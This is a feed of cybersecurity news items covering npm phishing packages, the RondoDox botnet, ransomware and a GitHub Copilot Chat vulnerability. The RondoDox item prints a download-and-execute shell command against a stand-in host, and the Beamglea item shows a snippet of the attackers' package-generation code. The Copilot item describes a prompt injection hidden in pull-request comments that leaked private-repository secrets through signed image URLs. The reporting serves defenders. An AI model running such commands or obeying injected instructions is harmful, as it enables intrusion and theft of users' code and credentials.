• Menlo Park, USA, October 10th, 2025, CyberNewsWire AccuKnox, a leader in Zero Trust Cloud Native Application Protection Platforms (CNAPP), is proud to announce that Nanoprecise has selected AccuKnox to enhance its cloud security, governance, and compliance framework. Nanoprecise is a pioneer predictive maintenance and condition monitoring, and leverages Artificial Intelligence and IoT technologies to deliver […]

    The post Nanoprecise partners with AccuKnox to strengthen its Zero Trust Cloud Security and Compliance Posture appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Socket’s Threat Research Team has uncovered a sophisticated phishing campaign involving 175 malicious npm packages that collectively accumulated over 26,000 downloads.

    The campaign, dubbed “Beamglea” based on consistent artifacts across all packages, represents a novel abuse of npm’s public registry and the unpkg.com CDN to host redirect scripts targeting 135+ industrial, technology, and energy companies worldwide.

    The packages themselves don’t execute malicious code during installation, making them particularly insidious as they exploit the npm ecosystem as free hosting infrastructure for credential harvesting operations.

    Credential phishing pages (Source – Socket.dev)

    While the packages’ randomized names following the pattern redirect-[a-z0-9]{6} make accidental developer installation unlikely, the substantial download counts likely include security researchers, automated scanners, and CDN infrastructure analyzing the packages after disclosure.

    The threat actors developed comprehensive Python tooling to automate the entire campaign, enabling them to create victim-specific HTML phishing lures themed as purchase orders and project documents.

    The origin and meaning of “beamglea” remains unclear, though it may represent a codename or inside reference used by the attackers.

    Socket.dev analysts identified the campaign as part of their routine scanning operations, building on initial findings by Paul McCarty at Safety who first discovered the phishing infrastructure on September 24, 2025.

    The researchers noted that most packages associated with this campaign remain live at the time of writing, prompting immediate petitions for their removal from the npm registry alongside suspension of the threat actors’ accounts.

    The campaign demonstrates remarkable sophistication in its technical implementation, representing a concerning evolution in supply chain abuse techniques.

    Prior to this disclosure, the term “beamglea” had virtually no online presence, making it an effective tracking identifier for this specific operation targeting organizations across multiple critical infrastructure sectors.

    Automated Package Generation Infrastructure

    The threat actors developed sophisticated Python automation to streamline their operations, utilizing redirect_generator.py scripts and PyInstaller-compiled executables for ease of deployment.

    The automation process demonstrates professional-level operational security planning and systematic victim targeting capabilities.

    The core automation takes three inputs: a JavaScript template file named beamglea_template.js, the victim’s email address, and the destination phishing URL.

    The system then processes these components through a five-step workflow that begins with npm authentication verification and proceeds through template processing, package creation, publication, and HTML lure generation.

    The random package name generation function creates unique identifiers using a six-character suffix of lowercase letters and numbers, ensuring each campaign remains distinct while following the recognizable redirect- prefix pattern.

    The JavaScript payload embedded in each package remains remarkably simple yet effective. Each beamglea.js file contains a processAndRedirect() function that appends the victim’s email as a URL fragment, leveraging the fact that fragments appear after the # symbol and don’t appear in standard server access logs.

    This technique creates an appearance of legitimacy when phishing pages pre-fill login forms with the victim’s email address.

    def generate_random_package_name(prefix="redirect-"):
        # Generates random 6-character suffix
        suffix = ''.join(random.choices(string.ascii_lowercase + string. Digits, k=6))
        return prefix + suffix
    
    # Template processing replaces placeholders with victim-specific data
    template_js = load_template('beamglea_template.js')
    final_js = template_js.replace("{{EMAIL}}", email).replace("{{URL}}", redirect_url)
    with open("beamglea.js", "w", encoding="utf-8") as f:
        f.write(final_js)

    The automation generates HTML lures with specific business document themes designed to bypass suspicion, utilizing filenames that mimic legitimate purchase orders, technical specifications, and project documents.

    All HTML files contain the campaign identifier nb830r6x in their meta tags, providing consistent tracking across the 630+ generated lures distributed across the 175 packages.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post 175 Malicious npm Packages With 26,000 Downloads Attacking Technology, and Energy Companies Worldwide appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A threat actor known as Storm-2657 has been observed hijacking employee accounts with the end goal of diverting salary payments to attacker-controlled accounts. “Storm-2657 is actively targeting a range of U.S.-based organizations, particularly employees in sectors like higher education, to gain access to third-party human resources (HR) software as a service (SaaS) platforms like Workday,” the

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.

    Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.

    In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.

    Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.

    Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.

    The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.

    Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.

    This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.

    Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.

    Infection Mechanism

    RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.

    Once a target is identified, the appropriate exploit payload—drawn from its extensive repository— is delivered.

    For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:-

    wget http[:]//malicious.example/exploit; chmod +x exploit
    ./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'

    After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.

    Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.

    Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.

    The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.

    A timeline of the RondoDox vulnerability (Source – Trend Micro)

    Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.

    Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.

    The table below provides a detailed overview of all 50+ vulnerabilities currently exploited by RondoDox, including their CVE identifiers, affected products, impact ratings, required exploit prerequisites, and CVSS 3.1 scores.

    #Vendor / ProductCVE IDCWE / TypeStatusNotes
    1Nexxt Router FirmwareCVE-2022-44149CWE-78 (Command Injection)N-Day
    2D-Link RoutersCVE-2015-2051CWE-78N-Day
    3Netgear R7000 / R6400CVE-2016-6277CWE-78N-Day
    4Netgear (mini_httpd)CVE-2020-27867CWE-78N-Day
    5Apache HTTP ServerCVE-2021-41773CWE-22 (Path Traversal / RCE)N-Day
    6Apache HTTP ServerCVE-2021-42013CWE-22N-Day
    7TBK DVRsCVE-2024-3721CWE-78Targeted
    8TOTOLINK (setMtknatCfg)CVE-2025-1829CWE-78N-Day
    9Meteobridge Web InterfaceCVE-2025-4008CWE-78N-Day
    10D-Link DNS-320CVE-2020-25506CWE-78N-Day
    11Digiever DS-2105 ProCVE-2023-52163CWE-78N-Day
    12Netgear DGN1000CVE-2024-12847CWE-78N-Day
    13D-Link (multiple)CVE-2024-10914CWE-78N-Day
    14Edimax RE11S RouterCVE-2025-22905CWE-78N-Day
    15QNAP VioStor NVRCVE-2023-47565CWE-78N-Day
    16D-Link DIR-816CVE-2022-37129CWE-78N-Day
    17GNU Bash (ShellShock)CVE-2014-6271CWE-78 (Code Injection)N-Day / Historical
    18Dasan GPON Home RouterCVE-2018-10561CWE-287 (Auth Bypass)N-Day
    19Four-Faith Industrial RoutersCVE-2024-12856CWE-78N-Day
    20TP-Link Archer AX21CVE-2023-1389CWE-78Targeted
    21D-Link RoutersCVE-2019-16920CWE-78N-Day
    22Tenda (fromNetToolGet)CVE-2025-7414CWE-78N-Day
    23Tenda (deviceName)CVE-2020-10987CWE-78N-Day
    24LB-LINK RoutersCVE-2023-26801CWE-78N-Day
    25Linksys E-SeriesCVE-2025-34037CWE-78N-Day
    26AVTECH CCTVCVE-2024-7029CWE-78N-Day
    27TOTOLINK X2000RCVE-2025-5504CWE-78N-Day
    28ZyXEL P660HN-T1ACVE-2017-18368CWE-78N-Day
    29Hytec HWL-2511-SSCVE-2022-36553CWE-78N-Day
    30Belkin Play N750CVE-2014-1635CWE-120 (Buffer Overflow)N-Day
    31TRENDnet TEW-411BRPplusCVE-2023-51833CWE-78N-Day
    32TP-Link TL-WR840NCVE-2018-11714CWE-78N-Day
    33D-Link DIR820LA1CVE-2023-25280CWE-78N-Day
    34Billion 5200W-TCVE-2017-18369CWE-78N-Day
    35Cisco (multiple products)CVE-2019-1663CWE-119 (Memory Corruption)N-Day
    36TOTOLINK (setWizardCfg)CVE-2024-1781CWE-78N-Day
    37Hikvision NVRCommand InjectionNo CVEListed by Trend Micro w/o CVE
    38Dahua DVRRemote Code ExecutionNo CVEListed by Trend Micro w/o CVE
    39Wavlink RoutersCWE-78No CVEListed by Trend Micro w/o CVE
    40ZTE ZXHN RouterCWE-78No CVEListed by Trend Micro w/o CVE
    41Seenergy NVRAuthentication BypassNo CVEListed by Trend Micro w/o CVE
    42Uniview NVRCWE-78No CVEListed by Trend Micro w/o CVE
    43TP-Link TD-W8960NCWE-78No CVEListed by Trend Micro w/o CVE
    44Dahua IP CameraCWE-78No CVEListed by Trend Micro w/o CVE
    45HiSilicon FirmwareBuffer OverflowNo CVEListed by Trend Micro w/o CVE
    46Amcrest CameraCWE-78No CVEListed by Trend Micro w/o CVE
    47Hikvision IP CameraCWE-78No CVEListed by Trend Micro w/o CVE
    48LILIN CameraCWE-78No CVEListed by Trend Micro w/o CVE
    49TP-Link WR941NCWE-78No CVEListed by Trend Micro w/o CVE
    50Wavlink WL-WN575A3CWE-78No CVEListed by Trend Micro w/o CVE
    51Dahua NVRCWE-78No CVEListed by Trend Micro w/o CVE
    52Tenda AC6CWE-78No CVEListed by Trend Micro w/o CVE
    53Hikvision DS-7108HGHICWE-78No CVEListed by Trend Micro w/o CVE
    54LB-LINK BL-WR450HCWE-78No CVEListed by Trend Micro w/o CVE
    55ZTE ZXHN H108NCWE-78No CVEListed by Trend Micro w/o CVE
    56Wavlink WL-WN531G3CWE-78No CVEListed by Trend Micro w/o CVE

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Adversaries have once again demonstrated that operational hours are irrelevant when mounting sophisticated cyberattacks. eSentire’s TRU team first observed suspicious activity within a financial services customer’s environment when legitimate CiscoVPN logins coincided with anomalous WMI calls to multiple endpoints. Investigation revealed that an Active Directory account named “serviceaccount” had been abused alongside the VPN access, […]

    The post Chaosbot Using CiscoVPN and Active Directory Passwords for Network Commands appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A significant uptick in Akira ransomware attacks has been observed exploiting unpatched SonicWall SSL VPN devices between July and August 2025. Despite a patch release the same day, many organizations remained vulnerable, allowing threat actors to gain initial access and deploy Akira’s double-extortion scheme. On August 20, 2025, Darktrace detected anomalous network scanning and reconnaissance […]

    The post SonicWall SSL VPN Devices Targeted by Threat Actors to Distribute Akira Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft Defender for Endpoint is incorrectly flagging specific versions of SQL Server as having reached their end-of-life, causing potential confusion for system administrators.

    The issue, tracked under advisory DZ1168079, stems from a code bug and affects the Threat and Vulnerability Management feature within the Microsoft Defender XDR suite.

    The bug impacts explicitly organizations running SQL Server 2017 and 2019. Within the Microsoft Defender for Endpoint portal, administrators may see an “End-Of-Support” (EOS) tag incorrectly applied to these software versions.

    Microsoft has clarified that while the EOS tag is erroneous, the associated vulnerability recommendations are legitimate and should still be addressed.

    This mislabeling creates a confusing situation where administrators must act on valid security alerts while ignoring the incorrect end-of-life status.

    The scope of the impact is significant, as it could affect any environment using these widely deployed SQL Server versions with Defender for Endpoint for security management.

    This can lead to misprioritization of tasks as teams may mistakenly believe they need to perform urgent software upgrades.

    Root Cause And Initial Response

    According to Microsoft, the problem originated from a recent change related to End-Of-Support software detection that introduced a code issue.

    The service degradation officially began on Wednesday, October 8, 2025, although Microsoft’s incident timeline traces the start of the impact back to Monday, September 29, 2025. Initially, the company reported that users might be seeing false positive vulnerability recommendations.

    However, after further investigation, it was determined that the vulnerability reports were accurate, but the EOS tags were being incorrectly applied.

    In response, Microsoft developed a fix intended to correct the faulty code and began deploying it to its test environment for validation before a wider rollout.

    Despite the initial remediation efforts, the problem persists. Microsoft confirmed on Thursday, October 9, that after deploying the fix, the inaccurate end-of-life tagging was still occurring for some users.

    This indicates that the first attempted solution was not entirely effective. The company’s engineers are now investigating what additional actions are necessary to ensure the fix is applied correctly and resolves the issue for all affected customers.

    The service status remains at “serviceDegradation,” and Microsoft has committed to providing its next update on the situation by Sunday, October 12, 2025.

    In the meantime, administrators are advised to acknowledge the legitimacy of the vulnerability alerts for SQL Server 2017 and 2019 but disregard the incorrect end-of-life notifications.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Microsoft Defender Incorrectly Flags SQL Server Software as End-of-life appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Fortra on Thursday revealed the results of its investigation into CVE-2025-10035, a critical security flaw in GoAnywhere Managed File Transfer (MFT) that’s assessed to have come under active exploitation since at least September 11, 2025. The company said it began its investigation on September 11 following a “potential vulnerability” reported by a customer, uncovering “potentially suspicious

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Socket’s Threat Research Team has uncovered a sprawling phishing campaign—dubbed “Beamglea”—leveraging 175 malicious npm packages that have amassed over 26,000 downloads. These packages serve solely as hosting infrastructure, redirecting victims to credential-harvesting pages. Though randomly named packages make accidental developer installation unlikely, the download counts reflect security researchers, automated scanners, and CDN providers probing the […]

    The post 175 Malicious npm Packages Targeting Tech and Energy Firms, 26,000 Downloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical vulnerability in GitHub Copilot Chat, rated 9.6 on the CVSS scale, could have allowed attackers to exfiltrate source code and secrets from private repositories silently.

    The exploit combined a novel prompt injection technique with a clever bypass of GitHub’s Content Security Policy (CSP), granting the attacker significant control over a victim’s Copilot instance, including the ability to suggest malicious code or links. The vulnerability was reported responsibly via HackerOne, and GitHub has since patched the issue.

    GitHub Copilot Vulnerability

    The attack began by exploiting GitHub Copilot’s context-aware nature. The AI assistant is designed to use information from a repository, such as code and pull requests, to provide relevant answers.

    Legit Security researchers found that they could embed a malicious prompt directly into a pull request description using GitHub’s “invisible comments” feature.

    While the comment itself is hidden from view in the user interface, Copilot would still process its contents. This meant an attacker could create a pull request containing a hidden malicious prompt, and any developer who later used Copilot to analyze that pull request would have their session compromised.

    Because Copilot operates with the permissions of the user making the request, the injected prompt could command the AI to access and manipulate data from the victim’s private repositories.

    Bypassing Security With A URL Dictionary

    A major hurdle for the attacker was GitHub’s strict Content Security Policy (CSP), which prevents the AI from leaking data to external domains.

    GitHub uses a proxy service called Camo to securely render images from third-party sites. Camo rewrites external image URLs into signed camo.githubusercontent.com links, and only URLs with a valid signature generated by GitHub are processed.

    This prevents attackers from simply injecting an <img> tag to send data to their own server. To circumvent this, the researcher devised an ingenious method.

    They pre-generated a dictionary of valid Camo URLs for every letter and symbol. Each URL pointed to a 1×1 transparent pixel on a server they controlled, according to a legit Security report.

    The final injected prompt instructed Copilot to find sensitive information in a victim’s private repository, such as an AWS key or a zero-day vulnerability description.

    It would then “draw” this information as a sequence of invisible images using the pre-generated Camo URL dictionary.

    When the victim’s browser rendered these images, it sent a series of requests to the attacker’s server, effectively leaking the sensitive data one character at a time.

    The proof-of-concept demonstrated the successful exfiltration of code from a private repository. In response to the disclosure, GitHub remediated the vulnerability on August 14, 2025, by completely disabling all image rendering within the Copilot Chat feature, neutralizing the attack vector.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Critical GitHub Copilot Vulnerability Let Attackers Exfiltrate Source Code From Private Repos appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶